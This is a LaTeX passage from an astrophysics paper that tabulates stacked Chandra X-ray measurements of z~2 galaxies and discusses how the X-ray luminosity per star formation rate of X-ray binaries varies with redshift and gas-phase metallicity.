\multicolumn{5}{l}{\textbf{\hspace{0.1cm}$-9.3<$ log(sSFR)$_{\mathrm{H}\alpha, \mathrm{corr}}$$<-8.4$}} \\ \cline{1-4}
7a & 24 & 15 & 7 & 2 & 2.04 & $10.001\pm0.001$ & $8.24^{+0.01}_{-0.02}$ & H$\alpha$, corr & $20.6^{+0.6}_{-0.2}$ & $-8.705^{+0.005}_{-0.002}$ \\
8a & 21 & 17 & 4 & 0 & 1.83 & $10.110\pm0.001$ & $8.35\pm0.01$ & H$\alpha$, corr & $23.4^{+0.7}_{-0.3}$ & $-8.791^{+0.013}_{-0.005}$ \\
9a & 15 & 11 & 4 & 0 & 1.86 & $10.408^{+0.002}_{-0.001}$ & $8.45^{+0.02}_{-0.03}$ & H$\alpha$, corr & $36.2^{+1.3}_{-0.5}$ & $-8.849^{+0.014}_{-0.006}$ \\
\cline{1-4}
\multicolumn{5}{l}{\textbf{\T \hspace{0.1cm}$-9.2<$ log(sSFR)$_{\mathrm{H}\alpha}$ $<-8.4$}} \\ \cline{1-4}
7b & 18 & 9 & 7 & 1 & 2.01 & $10.019\pm0.001$ & $8.22\pm0.02$ & H$\alpha$ & $26.0^{+0.7}_{-0.3}$ & $-8.650^{+0.011}_{-0.004}$ \\
8b & 20 & 17 & 3 & 0 & 1.94 & $10.177\pm0.001$ & $8.38\pm0.01$ & H$\alpha$ & $28.9^{+0.9}_{-0.4}$ & $-8.720^{+0.014}_{-0.005}$ \\
9b & 14 & 10 & 4 & 0 & 1.89 & $10.343^{+0.002}_{-0.001}$ & $8.45^{+0.02}_{-0.03}$ & H$\alpha$ & $36.0^{+1.3}_{-0.5}$ & $-8.827^{+0.014}_{-0.006}$ \\
\cline{1-4}
\multicolumn{5}{l}{\textbf{\T \hspace{0.1cm}$-9.05<$ log(sSFR)$_{\mathrm{SED}}$ $<-8.5$}} \\ \cline{1-4}
7c & 22 & 13 & 8 & 1 & 2.05 & $9.980\pm0.001$ & $8.25^{+0.01}_{-0.02}$ & SED & $19.4^{+0.2}_{-0.1}$ & $-8.663^{+0.005}_{-0.003}$ \\
8c & 22 & 18 & 4 & 0 & 1.81 & $10.113^{+0.002}_{-0.001}$ & $8.35^{+0.01}_{-0.01}$ & SED & $22.0\pm0.2$ & $-8.801^{+0.005}_{-0.003}$ \\
\B9c & 15 & 10 & 5 & 0 & 1.75 & $10.192^{+0.002}_{-0.001}$ & $8.50\pm0.02$ & SED & $25.3^{+0.3}_{-0.2}$ & $-8.851^{+0.005}_{-0.003}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: log(sSFR) $>-8.8$}} \\
\hline
\T \B 10 & 37 & 26 & 6 & 3 & 2.03 & $10.117^{+0.002}_{-0.001}$ & $8.30^{+0.01}_{-0.02}$ & H$\alpha$, corr & $37.5^{+1.2}_{-0.5}$ & $-8.508^{+0.009}_{-0.004}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: redshift binning}} \\
\hline
\T 11 & 8 & 7 & 1 & 0 & 1.49 & $10.140^{+0.003}_{-0.001}$ & $8.31^{+0.01}_{-0.03}$ & H$\alpha$, corr & $39.0^{+1.2}_{-0.5}$ & $-8.510^{+0.011}_{-0.005}$ \\
\B 12 & 29 & 21 & 5 & 3 & 2.27 & $10.106\pm0.001$ & $8.29^{+0.01}_{-0.02}$ & H$\alpha$, corr & $36.9^{+1.2}_{-0.5}$ & $-8.508^{+0.008}_{-0.004}$\\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: metallicity binning}} \\
\hline
\T 13 & 19 & 12 & 4 & 3 & 2.12 & $10.012^{+0.002}_{-0.001}$ & $8.23\pm0.02$ & H$\alpha$, corr & $30.2^{+0.9}_{-0.4}$ & $-8.493^{+0.006}_{-0.003}$ \\
\B 14 & 17 & 15 & 2 & 0 & 1.87 & $10.264^{+0.002}_{-0.001}$ & $8.40\pm0.01$ & H$\alpha$, corr & $51.6^{1.7}_{-0.7}$ & $-8.530^{+0.014}_{-0.006}$ \\
\hline
\hline \hline
\multicolumn{11}{p{7.0in}}{\T Notes:
(h) X-ray weighted, median oxygen abundance of the galaxy stack based on O3N2 indicator \citep{pettini04}.
(i) SED SFR listed assumes $Z=0.02$, Calzetti extinction curve, and constant SF history. The H$\alpha$ indicator assumed $Z=0.02$ and the Cardelli extinction curve. For the H$\alpha$, corr indicator, the conversion factor for galaxies with 12+log(O/H)$<8.3$ assumes $Z=0.004$ and the Cardelli extinction curve.
} \\
\end{tabular}
\label{tab:prop}
\end{minipage}
\end{table*}
\begin{table*}
\begin{minipage}{\textwidth}
\centering
\footnotesize
\caption{Stacked X-ray Properties}
\begin{tabular}{cccccclc} \hline \hline
\T \multirow{2}{*}{Stack ID} & Total exposure & Effective exposure & \multirow{2}{*}{$P_{\mathrm{random}}$} & \multirow{2}{*}{Net counts} & $\langle L_{\mathrm{X}} \rangle$ & SFR & \multirow{2}{*}{log$\frac{\langle L_{\mathrm{X}}\rangle}{\langle \mathrm{SFR}\rangle_{H\alpha,\mathrm{corr}}}$}\\
& (Ms) & (Ms cm$^{-2}$) & & & ($10^{40}$ erg s$^{-1}$) & Indicator & \\
(a) & (b) & (c) & (d) & (e) & (f) & (g) & (h)\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR}} \\
\hline
\T 1 & 105.1 & 25779 & 1.5e-8 & $96\pm19$ & $19.9^{+3.1}_{-4.4}$ & H$\alpha$, corr & $39.94^{+0.06}_{-0.11}$\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: redshift binning}} \\
\hline
\T 2 & 23.8 & 6204 & 3.7e-4 & $26^{+10}_{-9}$ & $11.8^{+2.2}_{-4.3}$ & H$\alpha$, corr & $39.85^{+0.08}_{-0.19}$\\
\B 3 & 81.3 & 19575 & 3.5e-6 & $70\pm17$ & $26.8^{+5.6}_{-7.1}$ & H$\alpha$, corr & $39.98^{+0.08}_{-0.13}$ \\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: metallicity binning}} \\
\hline
\T 4 & 50.5 & 12029 & 3.8e-4 & $40\pm13$ & $20.5^{+4.3}_{-6.8}$ & H$\alpha$, corr & $39.96^{+0.08}_{-0.18}$ \\
5 & 22.6 & 5422 & 2.3e-4 & $27^{+10}_{-9}$ & $24.4^{+11.7}_{-4.9}$ & H$\alpha$, corr & $39.95^{+0.17}_{-0.10}$ \\
\B 6 & 21.8 & 5576 & 3.9e-3 & $22^{+10}_{-9}$ & $17.5^{+5.6}_{-7.7}$ & H$\alpha$, corr & $39.84^{+0.12}_{-0.25}$ \\
\hline
\multicolumn{5}{l}{\textbf{Restricted sSFR: metallicity binning}} \\
\hline
\T 7a & 38.7 & 9245 & 5.8e-6 & $42\pm11$ & $27.4^{+7.0}_{-5.2}$ & H$\alpha$, corr & $40.12^{+0.10}_{-0.09}$ \\
8a & 21.1 & 5046 & 4.6e-4 & $25^{+9}_{-8}$ & $23.8^{+13.9}_{-6.2}$ & H$\alpha$, corr & $40.01^{+0.20}_{-0.13}$ \\
9a & 16.4 & 4080 & 9.2e-3 & $18^{+9}_{-8}$ & $21.4^{+8.8}_{-11.2}$ & H$\alpha$, corr & $39.77^{+0.15}_{-0.32}$\\
\\
7b & 27.3 & 6868 & 8.2e-6 & $32^{+10}_{-9}$ & $27.6^{+7.7}_{-5.6}$ & H$\alpha$ & $40.03^{+0.11}_{-0.10}$ \\
8b & 19.1 & 4513 & 1.6e-4 & $26^{+9}_{-8}$ & $32.1^{+8.8}_{-9.5}$ & H$\alpha$ & $40.04^{+0.11}_{-0.15}$ \\
9b & 15.6 & 3880 & 1.4e-2 & $16^{+9}_{-8}$ & $21.5^{+9.4}_{-11.9}$ & H$\alpha$ & $39.78^{+0.16}_{-0.35}$\\
\\
7c & 32.4 & 8004 & 5.0e-4 & $30\pm10$ & $23.1^{+8.0}_{-6.5}$ & SED & $40.08^{+0.13}_{-0.14}$ \\
8c & 21.8 & 5215 & 5.6e-4 & $24^{+9}_{-8}$ & $22.0^{+12.2}_{-4.4}$ & SED & $40.00^{+0.19}_{-0.10}$\\
\B 9c & 17.5 & 4587 & 2.6e-2 & $14^{+9}_{-8}$ & $13.1^{+1.5}_{-4.4}$ & SED & $39.71^{+0.05}_{-0.18}$\\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: log(sSFR) $>-8.8$}} \\
\hline
\T 10 & 52.1 & 12656 & 2.4e-5 & $54\pm14$ & $25.8^{+5.8}_{-5.5}$ & H$\alpha$, corr & $39.84^{+0.09}_{-0.11}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: redshift binning}} \\
\hline
\T 11 & 7.4 & 1717 & 8.1e-3 & $11^{+6}_{-5}$ & $16.7^{+4.6}_{-7.6}$ & H$\alpha$, corr & $39.63^{+0.11}_{-0.26}$ \\
\B 12 & 46.2 & 10939 & 2.9e-4 & $43\pm14$ & $29.8^{+8.0}_{-7.7}$ & H$\alpha$, corr & $39.91^{+0.10}_{-0.13}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: metallicity binning}} \\
\hline
\T 13 & 37.3 & 8738 & 2.8e-3 & $30\pm12$ & $23.1^{+7.9}_{-6.2}$ & H$\alpha$, corr & $39.88\pm0.13$\\
\B 14 & 15.6 & 3731 & 3.5e-3 & $19^{+9}_{-8}$ & $26.4^{+6.4}_{-8.0}$ & H$\alpha$, corr & $39.71^{+0.09}_{-0.15}$\\
\hline \hline
\multicolumn{8}{p{6.0in}}{\T Notes:
(c) Total exposure multiplied by \textit{Chandra} effective area.
(e) Errors are based on Poisson statistics.
(g) Errors are based on bootstrapping.
} \\
\end{tabular}
\label{tab:xray}
\end{minipage}
\end{table*}
\subsection{Stacked Metallicity Measurements}
To maximize our sample size and reduce biases in our galaxy sample, in our stacking analysis we include galaxies with upper or lower limits on their oxygen abundance based on the O3N2 indicator. For parts of our analysis we split our sample into different $Z$ bins. In the highest $Z$ bin, we include galaxies with 12+log(O/H) lower limits higher than the bin's lower bound, and in the lowest $Z$ bin, we include galaxies with 12+log(O/H) upper limits lower than the bin's upper bound. Overall, for the 79 galaxies in our full sample, we have 59 O/H measurements, 18 upper limits, and 2 lower limits. \par
Due to the inclusion of upper and lower limits on 12+log(O/H), we cannot simply average the O/H values of the galaxies in each stack. Instead, using the method of \citet{sanders15}, we measure the stacked O/H by making composite spectra of the galaxies in each stack. Each galaxy spectrum was shifted to rest frame, converted from flux density to luminosity density, corrected for reddening assuming the \citet{cardelli89} attenuation curve, interpolated onto a common wavelength grid, and normalized by the H$\alpha$ luminosity.
Normalized composite spectra were created by taking the X-ray weighted ($\omega$) median value of the normalized spectra. Emission-line luminosities were measured from the composite spectra by fitting a flat continuum and Gaussian profiles to regions around emission features. Uncertainties were estimated using a Monte Carlo technique. Testing this method using only galaxies with detections of all lines of interest, this stacking method was found to robustly reproduce the X-ray weighted median line ratios of the galaxies in a stack. \par
\section{Results and Discussion}
\label{sec:results}
\subsection{The redshift evolution of XRBs}
\label{sec:zevol}
We first investigate whether our galaxy sample supports the redshift evolution of $L_{\mathrm{X}}$/SFR of XRBs found by previous studies (e.g. \citealt{lehmer16}; \citealt{aird17}). We use X-ray stacks of our full $z\sim2$ sample as well as the subsample of galaxies with sSFR$>10^{-8.8}$ yr$^{-1}$. These high sSFR stacks should be dominated by HMXBs, while the full sample stacks likely contain significant contributions from both LMXBs and HMXBs, as discussed in more detail in \S\ref{sec:hmxb}. Since our galaxy sample is bimodally distributed in redshift due to atmospheric windows (see Figure \ref{fig:redshift}), we also split the galaxy sample between these two redshift intervals: $1.3<z<1.7$ and $2.0<z<2.6$. Information for all the aforementioned stacks is provided in rows \#$1-3$ and $10-12$ of Tables \ref{tab:prop} and \ref{tab:xray}. The full sample redshift stacks are represented by colored squares in Figure \ref{fig:lxzdep}, while the high sSFR stacks are shown by colored stars. \par
\begin{figure}
\centering
\includegraphics[width=0.5\textwidth]{LXSFRvsredshift.ps}
\vspace{0.25in}
\caption{Stacked $L_{\mathrm{X}}$/SFR values of our galaxy sample split into $z\sim1.5$ and $z\sim2.3$ redshift bins are shown by small squares/stars; squares represent stacks of the full galaxy sample, stars represent stacks of high sSFR (sSFR$>10^{-8.8}$ yr$^{-1}$) galaxies that are HMXB-dominated, and colors represent the weighted median oxygen abundance of the stacks. The larger square (star) symbol represents the combined $z\sim2$ stack of all (high sSFR) galaxies. The colored diamond and triangle represent local ($z=0$) measurements of the $L_{\mathrm{X}}$-SFR relation.
The long and short dashed lines show the redshift evolution of $L_{\mathrm{X}}$/SFR for the total XRB (dark gray) and HMXB-only (light gray) emission derived by \citet{lehmer16} and \citet{aird17}; since the \citetalias{lehmer16} total XRB evolution and the \citetalias{aird17} HMXB-only evolution are parametrized as non-linear relations between $L_{\mathrm{X}}$ and SFR, these curves have been normalized for SFR$=20 M_{\odot}$ yr$^{-1}$, the mean SFR of our $z\sim2$ galaxy sample. Our stacks lie above the $z=0$ measurements and are consistent with the redshift evolution measured by previous studies. }
\label{fig:lxzdep}
\end{figure}
In Figure \ref{fig:lxzdep}, we also show $L_{\mathrm{X}}$/SFR values measured by two studies (\citealt{lehmer10}; \citealt{mineo12}, hereafter \citetalias{lehmer10} and \citetalias{mineo12}, respectively) using samples of nearby galaxies at $z=0$. The \citetalias{mineo12} value is converted from the $0.5-8$ to $2-10$ keV band assuming $\Gamma=2.0$ and $N_{\mathrm{H}}=3\times10^{21}$ cm$^{-2}$, the average column density measured for their galaxy sample. Both the \citetalias{lehmer10} and \citetalias{mineo12} values are converted to be consistent with a Chabrier IMF. The 0.3 dex difference between these local values is likely due to sample selection effects. In fact, it is possible that the average metallicity of the galaxies in the \citetalias{lehmer10} and \citetalias{mineo12} differs significantly. Metallicity information is not available for all the galaxies in the \citetalias{lehmer10} or \citetalias{mineo12} samples. Therefore, we estimate the mean O/H for the \citetalias{lehmer10} sample using the $M_*-Z$ relation from \citet{kewley08} based on the O3N2 calibration by \citep{pettini04}, and by combining the O/H measurements for 19 of the \citetalias{mineo12} galaxies gathered by \citet{douna15} and estimates based on the $M_*-Z$ relation for the remaining 10 \citetalias{mineo12} galaxies. As shown by the colorbar in Figure \ref{fig:lxzdep}, we find that the mean O/H of the \citetalias{lehmer10} sample is much higher (12+log(O/H) $=8.71$) than the value for the \citetalias{mineo12} sample (12+log(O/H) $=8.57$). This difference could contribute to the discrepancy between these two local measurements of $L_{\mathrm{X}}$/SFR.
\par
Both the $z\sim1.5$ and $z\sim2.3$ stacks lie above the local $L_{\mathrm{X}}$/SFR values, although due to the large error bars, the $z\sim1.5$ stacks are statistically consistent with the \citetalias{mineo12} local value. The $L_{\mathrm{X}}$/SFR of the $z\sim2.3$ stacks are higher than, but statistically consistent with, the $z\sim1.5$ stacks. The $L_{\mathrm{X}}$/SFR of the $z\sim2.3$ full sample stack is 2.3$\sigma$ higher than the \citetalias{mineo12} value of $3.7\times10^{39}$ erg s$^{-1}$ $M_{\odot}$ yr and $3.1\sigma$ higher than the \citetalias{lehmer10} value of $1.6\times10^{39}$ erg s$^{-1}$ $M_{\odot}$ yr. \citet{fornasini18} find that for X-ray stacks with $\lesssim50$ galaxies such as these, $\langle L_{\mathrm{X}} \rangle$ may be biased to higher values than the true mean by 0.15 dex;\footnote{For small galaxy sample, $\langle L_{\mathrm{X}} \rangle$ can be biased to high values due to insufficient sampling of the XRB luminosity function.} however, even accounting for this possible systematic effect, the $z\sim2.3$ stacks have enhanced $L_{\mathrm{X}}$/SFR compared to the \citetalias{lehmer10} and \citetalias{mineo12} relations. Both the $z\sim1.5$ and $z\sim2.3$ full sample stacks are in good agreement with the $L_{\mathrm{X}}$/SFR values expected from the redshift evolution of the total X-ray binary (XRB) emission measured by \citet{lehmer16} (shown by the dark gray long-dashed line in Figure \ref{fig:lxzdep}; hereafter \citetalias{lehmer16}) and \citet{aird17} (shown by the dark gray short-dashed line; hereafter \citetalias{aird17}). \par
Both these previous studies also decompose the total XRB emission into an LMXB contribution proportional to $M_*$ and an HMXB contribution proportional to SFR; the latter is traced by the light gray lines in Figure \ref{fig:lxzdep}. The high sSFR stacks, which represent the most HMXB-dominated galaxies, are consistent (within 1.7$\sigma$) with the HMXB-only redshift evolution measured by \citetalias{lehmer16} and \citetalias{aird17}. Thus, our galaxy sample supports the redshift evolution of $L_{\mathrm{X}}$/SFR measured by other works.
\subsection{The metallicity dependence of XRBs}
\label{sec:zdep}
Having established that our $z\sim2$ galaxy sample does show enhanced $L_{\mathrm{X}}$/SFR relative to $z=0$ galaxies, we investigate whether this enhancement could be driven by the $Z$ dependence of HMXBs. We tried simultaneously splitting our sample by redshift and $Z$ but we do not have a sufficiently high signal-to-noise ratio to obtain meaningful results. Therefore, we instead split our full sample with $1.3<z<2.6$ by $Z$, and find that splitting the sample into three bins with divisions at 12+log(O/H) $=8.3$ and 8.4 yields detections with $>2.5\sigma$ significance (see stacks \# $4-6$ in Tables \ref{tab:prop} and \ref{tab:xray}). \par
\begin{figure*}
\centering
\includegraphics[width=0.85\textwidth]{LXSFRvsZ_sSFRdep_v3.ps}
\vspace{0.5in}
\caption{$L_{\mathrm{X}}$/SFR versus oxygen abundance measurements for stacks of galaxies selected using different sSFR criteria, colored according to sSFR. The dotted line shows the local $L_{\mathrm{X}}$-SFR-$Z$ relation from \citetalias{brorby16} based on nearby galaxies spanning $7.0<$ 12+log(O/H) $<9.0$ with corresponding error shown in light gray. The mean of the six best-fitting models from \citetalias{fragos13b} is shown as a dash-dotted line, with the parameter space covered by these six models shown in dark gray. The best-fit model from \citetalias{madau17} is shown by a dashed line, and has been converted from the \citet{kk04} $R_{23}$ scale to the O3N2 scale from \citet{pettini04} using the conversion from \citet{kewley08}. Results for a restricted sSFR range that yields a similar sSFR distribution across all $Z$ are shown by circles; the $L_{\mathrm{X}}$/SFR of these stacks favors a $Z$-dependent model. Results for high sSFR stacks are shown by triangles; this sample provides the cleanest measurement of HMXB-only $L_{\mathrm{X}}$/SFR and is consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation and some theoretical models.}
\label{fig:lxssfr}
\end{figure*}
These three $Z$ stacks show a slight hint of an anti-correlation between $L_{\mathrm{X}}$/SFR and O/H.
However, given the large statistical errors on $L_{\mathrm{X}}$, the $L_{\mathrm{X}}$/SFR values of all these bins are consistent within 1$\sigma$ with a constant ($Z$-independent) value. Thus, from these stacks, it is not possible to determine whether the redshift evolution of $L_{\mathrm{X}}$/SFR is driven by metallicity or some other factor since both a $Z$-dependent and $Z$-independent model can fit the data. \par
However, it is important to consider if systematic factors may impact this result. As mentioned in \S \ref{sec:sample}, a key variable which is known to affect $L_{\mathrm{X}}$/SFR is the sSFR \citep{lehmer10}. Since $L_{\mathrm{HMXB}}$ is correlated with SFR and $L_{\mathrm{LMXB}}$ is correlated with $M_*$, galaxies with lower sSFR have higher $L_{\mathrm{X}}$/SFR due to the larger fractional contribution of LMXBs to the X-ray emission. \par
The average sSFR and $Z$ of the three stacks based our full sample are strongly anti-correlated. As reported in Table \ref{tab:prop}, the average sSFR of these three stacks spans 0.4 dex, and $L_{\mathrm{X}}$/SFR can vary by up to 0.3 dex over this sSFR range \citep{lehmer10}. Such variation is comparable in magnitude to the predicted decrease of $L_{\mathrm{X}}$/SFR with $Z$ for the $Z$ range probed by our stacks (\citealt{fragos13b}; \citealt{madau17}; hereafter \citetalias{fragos13b} and \citetalias{madau17}, respectively). Thus, $L _{\mathrm{X}}$/SFR could be inflated for the highest $Z$ stack due to its lower sSFR and deflated for the lowest $Z$ stack due to its higher sSFR. As a result, the fact that $Z$ and sSFR are anti-correlated could artificially mask the expected decrease of $L_{\mathrm{X}}$/SFR with $Z$. \par
Therefore, to reduce possible systematic effects associated with sSFR, we further restricted our sample to galaxies with $-9.3<$ log(sSFR) $<-8.4$, a range of sSFR values common across all $Z$. This sSFR-matching criterion reduces the spread of weighted average sSFR values of the stacks to 0.15 dex (see stacks \# $7a-9a$ in Tables \ref{tab:prop} and \ref{tab:xray}). This residual anti-correlation between $Z$ and sSFR that exists in the sSFR-restricted stacks may still slightly flatten the intrinsic $L_{\mathrm{X}}$-SFR-$Z$ relation, but the impact on the stacked $L_{\mathrm{X}}$/SFR should be $<0.1$ dex. \par
The resulting $L_{\mathrm{X}}$/SFR values versus $Z$ are shown by the circles in Figure \ref{fig:lxssfr}.
The sSFR-restricted stacks are not consistent within 1$\sigma$ uncertainties with a constant ($Z$-independent) $L_{\mathrm{X}}$/SFR value. We estimate the significance of the observed anti-correlation by calculating the probability that the data points are described by a power-law relation between $L_{\mathrm{X}}$/SFR and $Z$ with a negative index rather than an index $\geq$0. The probability that the data are consistent with a negative correlation between $L_{\mathrm{X}}$/SFR and $Z$ is 97\%. This result is robust to the statistical uncertainties in the stacked O/H values. Thus, this study provides the first direct evidence that the $L_{\mathrm{X}}$/SFR of XRBs at $z>0$ is anti-correlated with $Z$, although due to the low X-ray statistics, this conclusion is only supported with $\approx2\sigma$ confidence. \par
The redshift of the sSFR-restricted stacks is roughly anti-correlated with O/H. Therefore, one might worry that the $Z$ dependence we observe is caused by the redshift evolution of $L_{\mathrm{X}}$/SFR, rather than vice versa. However, the weighted average redshifts of the stacks vary by $<$0.2. As found by previous studies and confirmed by our redshift-binned stacks, $L_{\mathrm{X}}$/SFR evolves too slowly with redshift for such a small $z$ difference to account for the 0.35 dex difference in $L_{\mathrm{X}}$/SFR between our lowest and highest $Z$ stacks. Therefore, the $Z$ dependence we measure cannot be attributed to the small variation in redshift between our stacks. \par
The sSFR-restricted stacks are in good agreement with the best-fit theoretical models of \citetalias{fragos13b} and \citetalias{madau17}, which predict an anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$. However, it should be noted that these models represent the X-ray emission of HMXBs alone, while our sSFR-restricted stacks likely include a significant LMXB contribution, and therefore some tension exists between our observations and these best-fit models (see \S\ref{sec:hmxb} for more details).\par
Based on the sSFR-restricted stacks alone, we cannot determine whether the observed anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$ at $z\sim2$ is driven by HMXBs, LMXBs, or both. The X-ray luminosity of LMXB populations is expected to decrease with increasing $Z$ for the same reason as for HMXBs \citep{fragos13a}, but the oxygen abundance of H{\small II} regions is not an adequate proxy for the metallicity of LMXBs, which are associated with the old stellar population. Furthermore, the dependence of $L_{\mathrm{LMXB}}$ on the age of the stellar population is predicted to be much stronger than its dependence on $Z$ (\citetalias{fragos13b}; \citetalias{madau17}). Thus, $L_{\mathrm{LMXB}}$ is not expected to depend directly on gas-phase O/H, but if gas-phase O/H and mean stellar age are positively correlated at $z\sim2$, then the dependence of $L_{\mathrm{LMXB}}/M_*$ on age may contribute to the observed anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$. In order for LMXBs to account for the majority of the observed trend, $L_{\mathrm{LMXB}}/M_*$ must be a factor of $\approx$7 higher in the lowest O/H stack compared to the highest O/H stack. According to the \citetalias{fragos13b} and \citetalias{madau17} LMXB models, such a large difference in $L_{\mathrm{LMXB}}/M_*$ could be explained by a mean stellar age difference of $\gtrsim2$ Gyr. However, the age of the Universe at $z\sim2$ is only 3.3 Gyr. Thus, it seems probable that HMXBs are responsible for at least a significant fraction of the observed anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$. In \S\ref{sec:hmxb}, this hypothesis is tested more directly.
\subsection{Comparing HMXB populations at $z=0$ and $z\sim2$}
\label{sec:hmxb}
In order to determine whether the redshift evolution of HMXBs is driven by the $Z$ dependence of $L_{\mathrm{X}}$/SFR, we further need to isolate the HMXB contribution to the observed XRB $Z$ dependence at $z\sim2$ and test whether it is the same as that measured in the local Universe.
In order to compare the normalization of the $L_{\mathrm{X}}$-SFR-$Z$ relation for HMXBs at $z\sim2$ and $z=0$, it is critical to minimize the absolute LMXB contribution by focusing on high sSFR galaxies. Isolating the HMXB contribution is necessary because the local relation has been determined using only HMXB-dominated galaxies with sSFR $>10^{-10}$ yr$^{-1}$ \citep{brorby16}. This high sSFR selection is also important for comparing our $z\sim2$ stacks to the \citetalias{fragos13b} and \citetalias{madau17} theoretical predictions that are based on the HMXB population alone. \par
As discussed in \S\ref{sec:sample}, while all the MOSDEF galaxies in our sample have sSFRs higher than the sSFR $>10^{-10}$ yr$^{-1}$ threshold used to select HMXB-dominated galaxies in the local Universe \citep{lehmer10}, this transition value increases with redshift due to the evolution of $L_{\mathrm{X}}$/SFR of HMXBs and $L_{\mathrm{X}}/M_*$ of LMXBs \citep{lehmer16}. Limiting our sample to log(sSFR) $>-8.8$, which is the approximate transition value found by \citet{lehmer16} at $z\sim2$, reduces the sample size by 50\%, resulting in very poor signal to noise in all but the lowest of the three $Z$ bins. Therefore, we combine galaxies in the middle $Z$ and high $Z$ bins to obtain a statistically meaningful second measurement. The $L_{\mathrm{X}}$/SFR values of the two high sSFR stacks are shown as triangles in Figures \ref{fig:lxssfr} and \ref{fig:lxhigh}, and the stack properties are provided in rows \# $13-14$ of Tables \ref{tab:prop} and \ref{tab:xray}. The $L_{\mathrm{X}}$/SFR values of the high sSFR stacks are lower than for the full sSFR and restricted sSFR samples, suggesting that there is a non-negligible LMXB contribution to the X-ray emission in the latter samples. Based on the differences between stacks with similar $Z$ but different $\langle sSFR \rangle$, we estimate that $L_{\mathrm{X}}/M_*$ due to LMXBs is approximately $2-8\times10^{30}$ erg s$^{-1} M_{\odot}^{-1}$. This $L_{\mathrm{X}}/M_*$ value is over an order of magnitude higher than local measurements for LMXB populations (\citealt{gilfanov04}; \citealt{colbert04}; \citealt{lehmer10}). However, this value is consistent with the predictions of the six best-fitting population synthesis models of \citet{fragos13a} for $z\sim2$ and the best model of \citet{madau17} for LMXB populations with stellar mass-weighted ages of $1.5-3$~Gyr. \par
The two high sSFR stacks favor a negative correlation between $L_{\mathrm{X}}$/SFR and $Z$ with 86\% confidence. While the significance of this result is not as high as for the restricted sSFR stacks, it suggests that the luminosity of HMXBs specifically, and not just XRBs generally, depends on $Z$ at $z\sim2$. The high sSFR stacks are consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation and the lower $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} population synthesis models. However, our high sSFR stacks exhibit significant ($>3\sigma$) tension with the upper $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} models and the best-fit \citetalias{madau17} model. Some of this tension may be due to remaining uncertainties in the absolute calibration of SFR indicators at $z\sim2$ and the absolute metallicity scale.
\par
Figure \ref{fig:lxhigh} shows the high sSFR stacks as well as the $z\sim2$ high sSFR stack and local $L_{\mathrm{X}}$/SFR measurements from \citetalias{lehmer10} and \citetalias{mineo12}. We calculated the mean oxygen abundance of these local samples as described in \S\ref{sec:zevol}; since many of the oxygen abundance estimates are based on the $M_*-z$ relation, we show the scatter of the $M_*-z$ relation from \citet{kewley08} as horizontal error bars for these local points. As shown, both the discrepancy between the local $L_{\mathrm{X}}$/SFR measurements and the enhanced $L_{\mathrm{X}}$/SFR of the $z\sim2$ stack can be explained by the anti-correlation of $L_{\mathrm{X}}$/SFR and $Z$. If we combine the high sSFR $z\sim2$ stacks with at least one of the mean $L_{\mathrm{X}}$/SFR values measured for $z=0$, then an anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$ is favored at $>99.7\% (>3\sigma)$ confidence. The significance of this trend established by combining mean measurements at $z\sim2$ and $z=0$ is comparable to the significance of the trend measured by \citetalias{brorby16} using individually detected galaxies at $z=0$.\par
Thus, we find that the $Z$ dependence of the $L_{\mathrm{X}}$/SFR of HMXBs at $z\sim2$ is consistent with that measured for $z=0$ and some theoretical models. This result provides the first direct link between the observed redshift evolution of $L_{\mathrm{X}}$/SFR and the $Z$ dependence of HMXBs.
\begin{figure*}
\centering
\includegraphics[width=0.85\textwidth]{LXSFRvsZ_highsSFR.ps}
\caption{$L_{\mathrm{X}}$/SFR versus stacked oxygen abundance for stacks of high sSFR (sSFR $>10^{-8.8}$) galaxies split by O/H are shown by triangles. A stack of all sSFR galaxies at $z\sim2$ is shown by a four-point star. These stacks provide the cleanest measurement of HMXB-only $L_{\mathrm{X}}$/SFR. They are consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation and the lower theoretical predictions from \citetalias{fragos13b}. These stacks are inconsistent with the \citetalias{madau17} model and the upper bound of \citetalias{fragos13b} models at $3\sigma$ confidence. The diamonds show local measurements of $L_{\mathrm{X}}$/SFR from \citet{lehmer10} and \citet{mineo12}; our estimates of the mean O/H values for these samples are described in \S\ref{sec:zevol}. The lines shown in this figure are as described in the caption for Figure \ref{fig:lxssfr}. }
\label{fig:lxhigh}
\end{figure*}
\subsection{The impact of different SFR indicators}
\label{sec:sfrindicator}
\begin{figure*}
\centering
\includegraphics[width=0.85\textwidth]{LXSFRvsZ_sSFR_comparison.ps}
\caption{$L_{\mathrm{X}}$/SFR versus stacked oxygen abundance for our galaxy sample restricted by sSFR. The top axis shows the corresponding metallicity in solar units ($Z_{\odot}=0.0142$) assuming a solar abundance pattern. Orange diamonds and red circles represent results based on H$\alpha$ SFRs assuming $Z=0.02$ and $Z=0.004$, respectively; the 1$\sigma$ error bars for these points are very similar, so only one set is shown for clarity. Dark blue squares and light blue triangles represent results based on SED SFRs, assuming $Z=0.02$ and the \citet{calzetti00} attenuation curve for the former, and $Z=0.004$ and the SMC attenuation curve for the latter. All SFR indicators favor an anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$, but with different significance as discussed in \S\ref{sec:sfrindicator}. The lines shown in this figure are as described in the caption for Figure \ref{fig:lxssfr}.}
\label{fig:lxsfrdiff}
\end{figure*}
